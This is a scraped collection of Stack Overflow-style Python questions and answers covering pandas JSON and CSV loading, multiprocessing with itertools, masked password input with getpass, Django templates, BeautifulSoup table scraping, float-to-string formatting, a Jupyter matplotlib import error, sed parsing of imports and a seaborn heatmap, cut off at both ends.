that your problem stems from these lines: `(SELECT STR_TO_DATE('5/18/2011 ',
'%c/%e/%Y')`. which should be: `STR_TO_DATE('2011/5/18', '%Y-%m-%d')`.
|
Convert string of list of dictionary to Python DataFrame
Question: I have a .JSON file which is around 3GB. I would like to read this JSON data
and load it to pandas data frames. Below is what i did so far..
Step 1: Read JSON file
import pandas as pd
with open('MyFile.json', 'r') as f:
data = f.readlines()
Step2: just take one component, since data is huge and i want to see how it
looks
cp = data[0:1]
print(cp)
['{"reviewerID": "AO94DHGC771SJ", "asin": "0528881469", "reviewerName": "amazdnu", "helpful": [0, 0], "reviewText": "some review text...", "overall": 5.0, "summary": "Gotta have GPS!", "unixReviewTime": 1370131200, "reviewTime": "06 2, 2013"}\n']
Step3: to remove new line('\n') character
while ix<len(t):
t[ix]=t[ix].rstrip("\n")
ix+=1
Questions:
1. Why this JSON data is in string? Am I making any mistakes?
2. How do I convert it into dictionary?
What I tried?
1. I tried `b=dict(zip(t[0::2],t[1::2]))`, but get - 'dict' object not callable
2. Tried joining, but did not work though
Can any one please help me? Thanks!
Answer: Why haven't you tried `pandas.read_json`?
import pandas as pd
df = pd.read_json('MyFile.json')
Works for the example you posted!
In[82]: i = '{"reviewerID": "AO94DHGC771SJ", "asin": "0528881469", "reviewerName": "amazdnu", "helpful": [0, 0], "reviewText": "some review text...", "overall": 5.0, "summary": "Gotta have GPS!", "unixReviewTime": 1370131200, "reviewTime": "06 2, 2013"}'
In[83]: pd.read_json(i)
Out[83]:
asin helpful overall reviewText reviewTime reviewerID reviewerName summary unixReviewTime
0 528881469 0 5 some review text... 06 2, 2013 AO94DHGC771SJ amazdnu Gotta have GPS! 1370131200
|
Python itertools with multiprocessing - huge list vs inefficient CPUs usage with iterator
Question: I work on n elements (named "pair" below) variations with repetition used as
my function's argument. Obviously everything works fine as long as the "r"
list is not big enough to consume all the memory. The issue is I have to make
more then 16 repetitions for 6 elements eventually. I use 40 cores system in
cloud for this.
The code looks looks like the following:
if __name__ == '__main__':
pool = Pool(39)
r = itertools.product(pairs,repeat=16)
pool.map(f, r)
I believe i should use iterator instead of creating the huge list upfront and
here the problem starts..
I tried to solve the issue with the following code:
if __name__ == '__main__':
pool = Pool(39)
for r in itertools.product(pairs,repeat=14):
pool.map(f, r)
The memory problem goes away but the CPUs usage is like 5% per core. Now the
single core version of the code is faster then this.
I'd really appreciate if you could guide me a bit..
Thanks.
Answer: Your original code isn't creating a `list` upfront in your own code
(`itertools.product` returns a generator), but `pool.map` is realizing the
whole generator (because it assumes if you can store all outputs, you can
store all inputs too).
Don't use `pool.map` here. If you need ordered results, using `pool.imap`, or
if result order is unimportant, use `pool.imap_unordered`. Iterate the result
of either call (don't wrap in `list`), and process the results as they come,
and memory should not be an issue:
if __name__ == '__main__':
pool = Pool(39)
for result in pool.imap(f, itertools.product(pairs, repeat=16)):
print(result)
If you're using `pool.map` for side-effects, so you just need to run it to
completion but the results and ordering don't matter, you could dramatically
improve performance by using `imap_unordered` and using `collections.deque` to
efficiently drain the "results" without actually storing anything (a `deque`
with `maxlen` of `0` is the fastest, lowest memory way to force an iterator to
run to completion without storing the results):
from collections import deque
if __name__ == '__main__':
pool = Pool(39)
deque(pool.imap_unordered(f, itertools.product(pairs, repeat=16)), 0)
Lastly, I'm a little suspicious of specifying 39 `Pool` workers;
`multiprocessing` is largely beneficial for CPU bound tasks; if you're using
using more workers than you have CPU cores and gaining a benefit, it's
possible `multiprocessing` is costing you more in IPC than it gains, and using
more workers is just masking the problem by buffering more data.
If your work is largely I/O bound, you might try using a thread based pool,
which will avoid the overhead of pickling and unpickling, as well as the cost
of IPC between parent and child processes. Unlike process based pools, Python
threading is subject to
[GIL](https://wiki.python.org/moin/GlobalInterpreterLock) issues, so your CPU
bound work in Python (excluding GIL releasing calls for I/O, `ctypes` calls
into .dll/.so files, and certain third party extensions like `numpy` that
release the GIL for heavy CPU work) is limited to a single core (and in Python
2.x for CPU bound work you often waste a decent amount of that resolving GIL
contention and performing context switches; Python 3 removes most of the
waste). But if your work is largely I/O bound, blocking on I/O releases the
GIL to allow other threads to run, so you can have many threads as long as
most of them delay on I/O. It's easy to switch too (as long as you haven't
designed your program to rely on separate address spaces for each worker by
assuming you can write to "shared" state and not affect other workers or the
parent process), just change:
from multiprocessing import Pool
to:
from multiprocessing.dummy import Pool
and you get the
[`multiprocessing.dummy`](https://docs.python.org/3/library/multiprocessing.html#module-
multiprocessing.dummy) version of the pool, based on threads instead of
processes.
|
Get password in Python Programming Language
Question: Is there any builtin function that can be used for getting a password in
python. I need answer like this
Input: Enter a username: abcdefg Enter a password : ******** If i enter a
password abcdefgt. It shows like ********.
Answer: ### Original
There is a function in the standard library module
[`getpass`](https://docs.python.org/3/library/getpass.html#module-getpass):
>>> import getpass
>>> getpass.getpass("Enter a password: ")
Enter a password:
'hello'
This function does not echo any characters as you type.
### Addendum
If you absolutely **must** have `*` echoed while the password is typed, and
you are on Windows, then you can do so by butchering the existing
`getpass.win_getpass` to add it. Here is an example (untested):
def starred_win_getpass(prompt='Password: ', stream=None):
import sys, getpass
if sys.stdin is not sys.__stdin__:
return getpass.fallback_getpass(prompt, stream)
# print the prompt
import msvcrt
for c in prompt:
msvcrt.putwch(c)
# read the input
pw = ""
while 1:
c = msvcrt.getwch()
if c == '\r' or c == '\n':
break
if c == '\003':
raise KeyboardInterrupt
if c == '\b':
pw = pw[:-1]
# PATCH: echo the backspace
msvcrt.putwch(c)
else:
pw = pw + c
# PATCH: echo a '*'
msvcrt.putwch('*')
msvcrt.putwch('\r')
msvcrt.putwch('\n')
return pw
Similarly, on unix, a solution would be to butcher the existing
`getpass.unix_getpass` in a similar fashion (replacing the `readline` in
`_raw_input` with an appropriate `read(1)` loop).
|
Send data from django to html
Question: I want to get data from database and send that to html page using django-
python.
What I'm doing in python file is
def module1(request):
table_list=student.objects.all()
context={'table_list' : table_list}
return render(request,'index.html',context)
And in html is
<div class="rightbox">
In right box. data is :<br> <br>
{% if table_list %}
<ul> {% for item in table_list %}
<li>{{ item.name }}</li>
<li>{{ item.address }}</li>
<li>{{ item.mob_no }}</li>
{% endfor %}
</ul>
{% else %}
<p>somethings is wrong</p>
{% endif %}
</div>
Nothing is being sent to html file. It is constantly going in else block. I
don't know where I'm making mistake.Please help me.
Answer: So far as we don't see your `student` model (which should be in your
`models.py` and be imported in your `vievs.py`) and your code doesn't throw
any exceptions it seems that your `table_list` is empty. To iterate it in more
convenient way you can use built in `for ... empty` template tag:
<div class="rightbox">
In right box. data is :<br> <br>
<ul>
{% for item in table_list %}
<li>{{ item.name }}</li>
<li>{{ item.address }}</li>
<li>{{ item.mob_no }}</li>
{% empty %}
<p>somethings is wrong</p>
{% endfor %}
</ul>
</div>
Try this and see what happens. If you'll find yourself in `{% empty %}` block
- your `table_list` is empty which is points to empty table in database.
Also check
[docs](https://docs.djangoproject.com/en/1.9/ref/templates/builtins/#for-
empty) for this tag.
|
Python pandas producing error when trying to access 'DATE' column on large data set
Question: I have a file with 3'502'379 rows and 3 columns. The following script is
supposed to be executed but raises and error in the date handling line:
import matplotlib.pyplot as plt
import numpy as np
import csv
import pandas
path = 'data_prices.csv'
data = pandas.read_csv(path, sep=';')
data['DATE'] = pandas.to_datetime(data['DATE'], format='%Y%m%d')
This is the error that occurs:
Traceback (most recent call last):
File "C:\Program Files\Python35\lib\site-packages\pandas\indexes\base.py", line 1945, in get_loc
return self._engine.get_loc(key)
File "pandas\index.pyx", line 137, in pandas.index.IndexEngine.get_loc (pandas\index.c:4066)
File "pandas\index.pyx", line 159, in pandas.index.IndexEngine.get_loc (pandas\index.c:3930)
File "pandas\hashtable.pyx", line 675, in pandas.hashtable.PyObjectHashTable.get_item (pandas\hashtable.c:12408)
File "pandas\hashtable.pyx", line 683, in pandas.hashtable.PyObjectHashTable.get_item (pandas\hashtable.c:12359)
KeyError: 'DATE'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\data\script.py", line 15, in <module>
data['DATE'] = pandas.to_datetime(data['DATE'], format='%Y%m%d')
File "C:\Program Files\Python35\lib\site-packages\pandas\core\frame.py", line 1997, in __getitem__
return self._getitem_column(key)
File "C:\Program Files\Python35\lib\site-packages\pandas\core\frame.py", line 2004, in _getitem_column
return self._get_item_cache(key)
File "C:\Program Files\Python35\lib\site-packages\pandas\core\generic.py", line 1350, in _get_item_cache
values = self._data.get(item)
File "C:\Program Files\Python35\lib\site-packages\pandas\core\internals.py", line 3290, in get
loc = self.items.get_loc(item)
File "C:\Program Files\Python35\lib\site-packages\pandas\indexes\base.py", line 1947, in get_loc
return self._engine.get_loc(self._maybe_cast_indexer(key))
File "pandas\index.pyx", line 137, in pandas.index.IndexEngine.get_loc (pandas\index.c:4066)
File "pandas\index.pyx", line 159, in pandas.index.IndexEngine.get_loc (pandas\index.c:3930)
File "pandas\hashtable.pyx", line 675, in pandas.hashtable.PyObjectHashTable.get_item (pandas\hashtable.c:12408)
File "pandas\hashtable.pyx", line 683, in pandas.hashtable.PyObjectHashTable.get_item (pandas\hashtable.c:12359)
KeyError: 'DATE'
Answer: the `'\ufeffDATE'` in the first column name shows that your CSV file has a
[UTF-16 Byte Order Mark (BOM)
signature](https://en.wikipedia.org/wiki/Byte_order_mark#Representations_of_byte_order_marks_by_encoding)
so it must be read accordingly.
so try this when reading your CSV:
df = pd.read_csv(path, sep=';', encoding='utf-8-sig')
or as [@EdChum suggested](http://stackoverflow.com/questions/38846590/python-
pandas-producing-error-when-trying-to-access-date-column-on-large-
data/38846829#comment65058304_38846590):
df = pd.read_csv(path, sep=';', encoding='utf-16')
both variants should work properly
PS [this answer](http://stackoverflow.com/a/17912811/5741205) shows how to
deal with BOMs
|
trying to scrape text from html that doesnt have any distinctive tags except br, PYTHON 3
Question: so I have been making a scraping program for my company websites but I have
run into an issue, basically I need to scrape out test from a html table but
The I am having trouble getting the data I need.
HTML CODE
<div>
<table class="style3" cellspacing="0" rules="all" border="1" id="ctl00_cpMainContent_gvNodes" style="border-color:White;border-style:None;width:1090px;border-collapse:collapse;">
<tr>
<th scope="col">History</th>
</tr><tr>
<td style="color:White;background-color:White;font-size:11pt;font-weight:bold;"> </td>
</tr><tr>
<td style="color:White;background-color:Blue;border-color:Black;border-style:Inset;font-size:12pt;font-weight:normal;">date updated: 02/01/2014 21:42:52 | By: jakubkwasny | Status: Resolved</td>
</tr><tr>
<td style="color:Black;background-color:LightSkyBlue;border-color:LightSkyBlue;font-size:12pt;font-weight:normal;"><br />Root Cause: Hardware Failure<br />Action Completed: Power supply/filter/cable swap<br /><br />Arrival Time: 02/01/2014 15:54:17<br />Leaving Time: 02/01/2014 16:27:44<br />Was the job successful: Yes<br /><br /><br />Notes:replaced dsl cable and filter. Also rebooted all equipment. All working fine now.<br />Next Action required:none<br />Added by jakubkwasny at 02/01/2014 21:41:40<br /><br />Pinging 99.99.99.99 with 32 bytes of data:<br />Reply from 99.99.99.99: bytes=32 time=67ms TTL=240<br />Reply from 99.999.999.99: bytes=32 time=92ms TTL=240<br />Reply from 99.99.65.65: bytes=32 time=76ms TTL=240<br />Reply from 67.45.32.12: bytes=32 time=82ms TTL=240<br /><br />Ping statistics for 12.12.12.12:<br />Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),<br />Approximate round trip times in milli-seconds:<br />Minimum = 67ms, Maximum = 92ms, Average = 79ms</td>
</tr><tr>
<td style="color:White;background-color:White;font-size:11pt;font-weight:bold;"> </td>
I need to able to scrape data inside br tags such as the data attached to the
third td tag, I have managed to get scrape all the data from the table but
cant figure out how to get specific rows and then get the stuff in the br tags
CODE SNIPPET
bsobjswap = BeautifulSoup(r2.content)
print (bsobjswap.find('table',{'id':'ctl00_cpMainContent_gvNodes'}).find("style",{"color":"Black"}))
this is my latest attempt but doesnt work. any help is appreciated
MORE DATA
<div id="ctl00_cpMainContent_upNodes">
<div>
<table class="style3" cellspacing="0" rules="all" border="1" id="ctl00_cpMainContent_gvNodes" style="border-color:White;border-style:None;width:1090px;border-collapse:collapse;">
<tr>
<th scope="col">History</th>
</tr><tr>
<td style="color:White;background-color:White;font-size:11pt;font-weight:bold;"> </td>
</tr><tr>
<td style="color:White;background-color:Blue;border-color:Black;border-style:Inset;font-size:12pt;font-weight:normal;">date updated: 02/01/2014 21:21:16 | By: jakubkwasny | Status: Resolved</td>
</tr><tr>
<td style="color:Black;background-color:LightSkyBlue;border-color:LightSkyBlue;font-size:12pt;font-weight:normal;"><br />Root Cause: Core / Authentication issue<br />Action Completed: No site visit required<br /><br />Hi Chris,<br /><br />There were no faults detected. As installation have been done recently, Lancom uses 2.05 configuration script. Our engineer was unable to see landing page, he was getting connected to the Internet with. I contacted Picopoint who informed me that this is due the fact that their system remembers MAC addresses of the devices that were logged into the system hence no landing page is needed. It have been confirmed by removing MAC addresses of the engineer's devices from the database. By doing so engineer was able to access the landing page again. Picopoint's engineer checked the configuration of the devices at both ends and haven't detected any problems. At the moment we are unable to state what are the issues with venue as we haven't experienced any. <br /><br />Arrival Time: 02/01/2014 16:19:23<br />Leaving Time: 02/01/2014 17:51:18<br />Was the job successful: Yes<br /><br /><br />Notes:Still physically missing lines 3 and 4. See screen shot.<br />Line 6 has a dial tone BUT no dsl is present on line.<br />Still getting some landing page errors.. My laptop now seems to work but my android phone justs connects to google with no landing page .<br /><br />Screen shots included but couldnt access youtube ( was recieveing an block ID error )<br />ASDA resriction ?<br /><br />Picopoint still looking into problem according to Jakub<br /><br />Next Action required:Ask Jakub<br />Added by jakubkwasny at 02/01/2014 21:10:12<br /><br />Pinging 11.11.11.11 with 32 bytes of data:<br />Reply from 11.11.11.11: bytes=32 time=47ms TTL=50<br />Reply from 11.11.11.11: bytes=32 time=38ms TTL=50<br />Reply from 11.11.11.11: bytes=32 time=39ms TTL=50<br />Reply from 11.11.11.11: bytes=32 time=41ms TTL=50<br /><br />Ping statistics for 11.11.11.11:<br />Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),<br />Approximate round trip times in milli-seconds:<br />Minimum = 38ms, Maximum = 47ms, Average = 41ms</td>
</tr><tr>
<td style="color:White;background-color:White;font-size:11pt;font-weight:bold;"> </td>
My code visits thousands of pages and looking at it each table follows the
same pattern and I am guessing I will always need the data from the third td
tag but not sure how to get it.
Cheers
Answer: How about this:
from bs4 import BeautifulSoup
html = """(your html from the example above)"""
soup = BeautifulSoup(html, 'html.parser')
row_data = soup.find('td', {'style':'color:Black;background-color:LightSkyBlue;border-color:LightSkyBlue;font-size:12pt;font-weight:normal;'})
clean_data = str(row_data).replace('<td style="color:Black;background-color:LightSkyBlue;border-color:LightSkyBlue;font-size:12pt;font-weight:normal;">','')\
.replace('</td>','')
print('\n'.join([x for x in clean_data.split('<br/>') if x != '']))
"""
Generated output:
Root Cause: Hardware Failure
Action Completed: Power supply/filter/cable swap
Arrival Time: 02/01/2014 15:54:17
Leaving Time: 02/01/2014 16:27:44
Was the job successful: Yes
Notes:replaced dsl cable and filter. Also rebooted all equipment. All working fine now.
Next Action required:none
Added by jakubkwasny at 02/01/2014 21:41:40
Pinging 99.99.99.99 with 32 bytes of data:
Reply from 99.99.99.99: bytes=32 time=67ms TTL=240
Reply from 99.999.999.99: bytes=32 time=92ms TTL=240
Reply from 99.99.65.65: bytes=32 time=76ms TTL=240
Reply from 67.45.32.12: bytes=32 time=82ms TTL=240
Ping statistics for 12.12.12.12:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 67ms, Maximum = 92ms, Average = 79ms
"""
|
Convert float to string without scientific notation and false precision
Question: I want to print some floating point numbers so that they're always written in
decimal form (e.g. `12345000000000000000000.0` or `0.000000000000012345`, not
in [scientific notation](https://en.wikipedia.org/wiki/Scientific_notation),
yet I'd want to keep the 15.7 decimal digits of precision and no more.
It is well-known that the `repr` of a `float` is written in scientific
notation if the exponent is greater than 15, or less than -4:
>>> n = 0.000000054321654321
>>> n
5.4321654321e-08 # scientific notation
If `str` is used, the resulting string again is in scientific notation:
>>> str(n)
'5.4321654321e-08'
* * *
It has been suggested that I can use `format` with `f` flag and sufficient
precision to get rid of the scientific notation:
>>> format(0.00000005, '.20f')
'0.00000005000000000000'
It works for that number, though it has some extra trailing zeroes. But then
the same format fails for `.1`, which gives decimal digits beyond the actual
machine precision of float:
>>> format(0.1, '.20f')
'0.10000000000000000555'
And if my number is `4.5678e-20`, using `.20f` would still lose relative
precision:
>>> format(4.5678e-20, '.20f')
'0.00000000000000000005'
Thus **these approaches do not match my requirements**.
* * *
This leads to the question: what is the easiest and also well-performing way
to print arbitrary floating point number in decimal format, having the same
digits as in [`repr(n)` (or `str(n)` on Python
3)](http://stackoverflow.com/a/28493269/918959), but always using the decimal
format, not the scientific notation.
That is, a function or operation that for example converts the float value
`0.00000005` to string `'0.00000005'`; `0.1` to `'0.1'`;
`420000000000000000.0` to `'420000000000000000.0'` or `420000000000000000` and
formats the float value `-4.5678e-5` as `'-0.000045678'`.
* * *
After the bounty period: It seems that there are at least 2 viable approaches,
as Karin demonstrated that using string manipulation one can achieve
significant speed boost compared to my initial algorithm on Python 2.
Thus,
* If performance is important and Python 2 compatibility is required; or if the `decimal` module cannot be used for some reason, then [Karin's approach using string manipulation](http://stackoverflow.com/a/38983595/918959) is the way to do it.
* On Python 3, [my somewhat shorter code will also be faster](http://stackoverflow.com/a/38847691/918959).
Since I am primarily developing on Python 3, I will accept my own answer, and
shall award Karin the bounty.
Answer: Unfortunately it seems that not even the new-style formatting with
`float.__format__` supports this. The default formatting of `float`s is the
same as with `repr`; and with `f` flag there are 6 fractional digits by
default:
>>> format(0.0000000005, 'f')
'0.000000'
* * *
However there is a hack to get the desired result - not the fastest one, but
relatively simple:
* first the float is converted to a string using `str()` or `repr()`
* then a new [`Decimal`](https://docs.python.org/3/library/decimal.html#decimal.Decimal) instance is created from that string.
* `Decimal.__format__` supports `f` flag which gives the desired result, and, unlike `float`s it prints the actual precision instead of default precision.
Thus we can make a simple utility function `float_to_str`:
import decimal
# create a new context for this task
ctx = decimal.Context()
# 20 digits should be enough for everyone :D
ctx.prec = 20
def float_to_str(f):
"""
Convert the given float to a string,
without resorting to scientific notation
"""
d1 = ctx.create_decimal(repr(f))
return format(d1, 'f')
Care must be taken to not use the global decimal context, so a new context is
constructed for this function. This is the fastest way; another way would be
to use `decimal.local_context` but it would be slower, creating a new thread-
local context and a context manager for each conversion.
This function now returns the string with all possible digits from mantissa,
rounded to the [shortest equivalent
representation](http://stackoverflow.com/a/28493269/918959):
>>> float_to_str(0.1)
'0.1'
>>> float_to_str(0.00000005)
'0.00000005'
>>> float_to_str(420000000000000000.0)
'420000000000000000'
>>> float_to_str(0.000000000123123123123123123123)
'0.00000000012312312312312313'
The last result is rounded at the last digit
As @Karin noted, `float_to_str(420000000000000000.0)` does not strictly match
the format expected; it returns `420000000000000000` without trailing `.0`.
|
Importing pyplot in a Jupyter Notebook
Question: Running Python 2.7 and trying to get plotting to work the tutorials recommend
the below command.
from matplotlib import pyplot as plt
Works fine when run from the command line
python -c "from matplotlib import pyplot as plt"
but I get an error when trying to run it inside a Jupyter Notebook.
---------------------------------------------------------------------------
ImportError Traceback (most recent call last)
<ipython-input-21-1d1446f6fa64> in <module>()
----> 1 from matplotlib import pyplot as plt
/usr/local/lib/python2.7/dist-packages/matplotlib/pyplot.py in <module>()
112
113 from matplotlib.backends import pylab_setup
--> 114 _backend_mod, new_figure_manager, draw_if_interactive, _show = pylab_setup()
115
116 _IP_REGISTERED = None
/usr/local/lib/python2.7/dist-packages/matplotlib/backends/__init__.pyc in pylab_setup()
30 # imports. 0 means only perform absolute imports.
31 backend_mod = __import__(backend_name,
---> 32 globals(),locals(),[backend_name],0)
33
34 # Things we pull in from all backends
/usr/local/lib/python2.7/dist-packages/ipykernel/pylab/backend_inline.py in <module>()
154 configure_inline_support(ip, backend)
155
--> 156 _enable_matplotlib_integration()
/usr/local/lib/python2.7/dist-packages/ipykernel/pylab/backend_inline.py in _enable_matplotlib_integration()
152 backend = get_backend()
153 if ip and backend == 'module://%s' % __name__:
--> 154 configure_inline_support(ip, backend)
155
156 _enable_matplotlib_integration()
/usr/local/lib/python2.7/dist-packages/IPython/core/pylabtools.pyc in configure_inline_support(shell, backend)
359 except ImportError:
360 return
--> 361 from matplotlib import pyplot
362
363 cfg = InlineBackend.instance(parent=shell)
ImportError: cannot import name pyplot
The following command works
import matplotlib
But the following gives me a similar error
import matplotlib.pyplot
Answer: You can also use the `%matplotlib inline` magic, but it has to be preceded by
the pure `%matplotlib` line:
**Works (figures in new window)**
%matplotlib
import matplotlib.pyplot as plt
**Works (inline figures)**
%matplotlib
%matplotlib inline
import matplotlib.pyplot as plt
**Does not work**
%matplotlib inline
import matplotlib.pyplot as plt
Also: [Failure to import matplotlib.pyplot in jupyter (but not
ipython)](http://stackoverflow.com/questions/38838914/failure-to-import-
matplotlib-pyplot-in-jupyter-but-not-ipython) seems to be the same issue. It
looks like a recently introduced bug in the ipykernel. Maybe someone mark this
or the other question as duplicate, thx.
|
How to jump on specific Page usinig Beautifulsoup
Question: I want to get data for Product which are search by user in python.I am able to
get data from any Urls but depending upon search Jump on that page and Get
data Using beautifulsoup.
I Try this for get data :
from bs4 import BeautifulSoup
import requests
import urllib2
url="http://amazon.in"
con=urllib2.urlopen(url).read()
soup=BeautifulSoup(con)
print soup.prettify()
But if user want price of IPhone 5s then it will jump to that product page and
get data.
How I get this.
Answer: You just need to do a get request passing the correct params:
import requests
from bs4 import BeautifulSoup
params = {"url":"search-alias=aps","field-keywords":"iphone 5"}
url = "http://www.amazon.in/s/ref=nb_sb_noss_2"
soup = BeautifulSoup(requests.get(url, params=params).content)
ul = soup.select_one("#s-results-list-atf")
ul will be contain all the search results you see on the page. If we run the
code and find the h2 tags inside each anchor, you can see the item
name/description as you see on the page.
In [6]: ul = soup.select_one("#s-results-list-atf")
In [7]: for h2 in ul.select("li a h2"):
...: print(h2.text)
...:
Apple iPhone 5s (Space Grey, 16GB)
Apple iPhone 5s (Silver, 16GB)
Supra Lightning 8 Pin To Micro Usb Charge Sync Data Connector Adapter Iphone 5 Ipad 4
OnePlus 3 (Graphite, 64GB)
Apple iPhone 5 (Black-Slate, 16GB)
ROCK 695029068729 Royce Series Shockproof Dual Layer Back Case Cover for Apple iPhone 5 5S,(Grey)
Apple iPhone 5c (White, 8GB)
iSAVE Soft Silicone Grid Design Back Case Cover For iPhone 5/5s (BLACK)
iPaky AT15312 360 Protective Body Case with Tempered Glass for Apple iPhone SE 5 5S,(Black)
Aeoss 9Pcs Open Pry Screwdriver Repair Tool Kit Set For iPhone 6 Plus 5 5s 5c 4 iPod.
2 IN 1 Tempered Glass for Iphone 5 5s 5c Explosion Proof Tempered Glass (FRONT AND BACK)
Itab iphone5sclearsoftgelly Imported Transparent Clear Silicone Jelly Soft Case Back Cover For Apple Iphone 5 5S
Shivam Earphones EarPods Handsfree Headphones for Apple iPhone 4/4s/5/5s/6/6+ (White)
USB Power Adapter Wall Charger&Data Cable for iPhone 5/5S/5C/6
Generic Ios 7 Compatible Data Sync Charging Cable For Apple Iphone 5 5S 6 - White
Tempered Glass Screen Protector Scratch Guard for Apple Iphone 5 5G 5s
|
Using sed to interpret multiple lines on condition
Question: I'm stuck on constructing a **sed** expression that will parse a python file's
imports and extract the names of the modules.
This is a simple example that I solved using (I need the output to be the
module names without 'as' or any spaces..):
from testfunctions import mod1, mod2 as blala, mod3, mod4
What I have so far:
grep -ir "from testfunctions import" */*.py | sed -E s/'\s+as\s+\w+'//g | sed -E s/'from testfunctions import\s+'//g
This does get me the required result in a situation as above.
**The problem:** In files where the imports are like so:
from testfunctions import mod1, mod2 as blala, mod3, mod4 \
mod5, mod6 as bla, mod7 \
mod8, mod9 ...
**Any ideas how I can improve my piped expression to handle multiple lines?**
Answer: Try this;
sed -n -r '/from/,/^\s*$/p;' *.py | sed ':x; /\\$/ { N; s/\\\n//; tx }' | sed 's/^.*.import//g;s/ */ /g'
|
HeatMap visualization
Question: I have a dataframe df1
df1.info()
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 38840 entries, 0 to 38839
Data columns (total 7 columns):
TIMESTAMP 38840 non-null datetime64[ns]
ACT_TIME_AERATEUR_1_F1 38696 non-null float64
ACT_TIME_AERATEUR_1_F3 38697 non-null float64
ACT_TIME_AERATEUR_1_F5 38695 non-null float64
ACT_TIME_AERATEUR_1_F6 38695 non-null float64
ACT_TIME_AERATEUR_1_F7 38693 non-null float64
ACT_TIME_AERATEUR_1_F8 38696 non-null float64
dtypes: datetime64[ns](1), float64(6)
memory usage: 2.1 MB
which looks like this :
TIMESTAMP ACT_TIME_AERATEUR_1_F1 ACT_TIME_AERATEUR_1_F3 ACT_TIME_AERATEUR_1_F5 ACT_TIME_AERATEUR_1_F6 ACT_TIME_AERATEUR_1_F7
ACT_TIME_AERATEUR_1_F8
2015-08-01 05:10:00 100 100 100 100 100 100
2015-08-01 05:20:00 100 100 100 100 100 100
2015-08-01 05:30:00 100 100 100 100 100 100
2015-08-01 05:40:00 100 100 100 100 100 100
I try to create a heatmap with seaborn to visualize data which are between two
date ( for example here between '2015-08-01 23:10:00' and '2015-08-02
02:00:00') : I do like this :
df1['TIMESTAMP']= pd.to_datetime(df_no_missing['TIMESTAMP'], '%d-%m-%y %H:%M:%S')
df1['date'] = df_no_missing['TIMESTAMP'].dt.date
df1['time'] = df_no_missing['TIMESTAMP'].dt.time
date_debut = pd.to_datetime('2015-08-01 23:10:00')
date_fin = pd.to_datetime('2015-08-02 02:00:00')
df1 = df1[(df1['TIMESTAMP'] >= date_debut) & (df1['TIMESTAMP'] < date_fin)]
sns.heatmap(df1.iloc[:,1:6:],annot=True, linewidths=.5)
I got a heatmap like in the attached
![enter image description here](http://i.stack.imgur.com/KnWie.png)
My question now is how can I replace the number in the left of the heatmap map
(145...161) by their corresponding values of timestamp (2015-08-01 05:10:00,
2015-08-01 05:20:00, 2015-08-01 05:30:00, ...)
Thank you
Bests
I try to make modifications :
df1.set_index("TIMESTAMP", inplace=1)
sns.heatmap(df1.iloc[:, 1:6:], annot=True, linewidths=.5)
ax = plt.gca()
ax.set_yticklabels([i.strftime("%Y-%m-%d %H:%M:%S") for i in df1.TIMESTAMP], rotation=0)
**EDIT**
But I get error and warning :
>
> C:\Users\Demonstrator\Anaconda3\lib\site-
> packages\ipykernel\__main__.py:2:
>
>
> SettingWithCopyWarning: A value is trying to be set on a copy of a slice
> from a DataFrame. Try using .loc[row_indexer,col_indexer] = value instead
>
>
> See the caveats in the documentation: http://pandas.pydata.org/pandas-
> docs/stable/indexing.html#indexing-view-versus-copy
> from ipykernel import kernelapp as app
> C:\Users\Demonstrator\Anaconda3\lib\site-
> packages\ipykernel\__main__.py:3:
>
>
> SettingWithCopyWarning: A value is trying to be set on a copy of a slice
> from a DataFrame. Try using .loc[row_indexer,col_indexer] = value instead
>
>
> See the caveats in the documentation: http://pandas.pydata.org/pandas-
> docs/stable/indexing.html#indexing-view-versus-copy
> app.launch_new_instance()
> C:\Users\Demonstrator\Anaconda3\lib\site-
> packages\ipykernel\__main__.py:4:
>
>
> SettingWithCopyWarning: A value is trying to be set on a copy of a slice
> from a DataFrame. Try using .loc[row_indexer,col_indexer] = value instead
>
>
> See the caveats in the documentation: http://pandas.pydata.org/pandas-
> docs/stable/indexing.html#indexing-view-versus-copy
>
>
>
>
>
> ---------------------------------------------------------------------------
> ValueError Traceback (most recent call
> last)
> <ipython-input-129-cec498d88cac> in <module>()
> 9
> 10 #sns.heatmap(df1.iloc[:,1:6:],annot=True, linewidths=.5)
> ---> 11 sns.heatmap(df1.iloc[:, 1:6:], annot=True, linewidths=.5)
> 12 ax = plt.gca()
> 13 ax.set_yticklabels([i.strftime("%Y-%m-%d %H:%M:%S") for i in
> df1.TIMESTAMP], rotation=0)
>
> C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in
>
>
> heatmap(data, vmin, vmax, cmap, center, robust, annot, fmt, annot_kws,
> linewidths, linecolor, cbar, cbar_kws, cbar_ax, square, ax, xticklabels,
> yticklabels, mask, **kwargs) 483 plotter = _HeatMapper(data, vmin, vmax,
> cmap, center, robust, annot, fmt, 484 annot_kws, cbar, cbar_kws,
> xticklabels, \--> 485 yticklabels, mask) 486 487 # Add the pcolormesh kwargs
> here
>
>
> C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in
>
>
> **init**(self, data, vmin, vmax, cmap, center, robust, annot, fmt,
> annot_kws, cbar, cbar_kws, xticklabels, yticklabels, mask) 165 # Determine
> good default values for the colormapping 166
> self._determine_cmap_params(plot_data, vmin, vmax, \--> 167 cmap, center,
> robust) 168 169 # Sort out the annotations
>
>
> C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in
>
>
> _determine_cmap_params(self, plot_data, vmin, vmax, cmap, center, robust)
> 204 calc_data = plot_data.data[~np.isnan(plot_data.data)] 205 if vmin is
> None: \--> 206 vmin = np.percentile(calc_data, 2) if robust else
> calc_data.min() 207 if vmax is None: 208 vmax = np.percentile(calc_data, 98)
> if robust else calc_data.max()
>
>
> C:\Users\Demonstrator\Anaconda3\lib\site-packages\numpy\core\_methods.py
>
>
> in _amin(a, axis, out, keepdims) 27 28 def _amin(a, axis=None, out=None,
> keepdims=False): \---> 29 return umr_minimum(a, axis, None, out, keepdims)
> 30 31 def _sum(a, axis=None, dtype=None, out=None, keepdims=False):
>
>
> ValueError: zero-size array to reduction operation minimum which has no
> identity
>
@jeanrjc, look at the last image, there is a problem: the image is too small
and there is two vertical line(scale)on the right. I hope that i'am clear
now[![enter image description
